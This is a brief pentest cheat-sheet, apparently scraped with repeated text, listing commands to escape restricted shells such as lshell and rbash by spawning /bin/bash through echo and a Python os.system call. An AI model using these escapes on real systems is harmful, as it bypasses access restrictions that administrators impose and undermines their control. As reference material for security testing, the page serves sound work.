Limited Shell Escape
Ways to escape limited shells.
lshell
$ echo os.system('/bin/bash')
rbash
python
>>import os;
>>os.system("/bin/bash");
Last updated
Ways to escape limited shells.
$ echo os.system('/bin/bash')
python
>>import os;
>>os.system("/bin/bash");
Last updated